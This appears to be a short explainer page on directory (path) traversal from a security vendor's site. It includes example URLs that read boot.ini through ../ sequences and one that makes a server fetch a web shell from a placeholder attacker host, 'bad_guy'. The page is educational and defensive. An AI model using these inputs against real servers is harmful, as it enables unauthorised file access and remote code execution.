Skip to content
Get A Demo
Free SIEM

    Directory Traversal

    directory traversal – sometimes called path traversal – is when an attacker attempts to access files outside of the main web root directory. When the server is vulnerable to directory traversal it can allow the attack broad access into server, allowing not only the ability to read the contents of files but also potentially run arbitrary commands depending on what they can access.

    Basic Example

    http://vulnerable_site.com/get_file.asp?file=file.pdf

    If the vulnerable_site.com was impacted by directory traversal, and let’s say the attacker wanted the boot.ini file in C:\, they could then theoritically run:

    http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini

    This becomes much more dangerous when the attacker is able to access binaries that can run code, or are from outside sources.

    http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp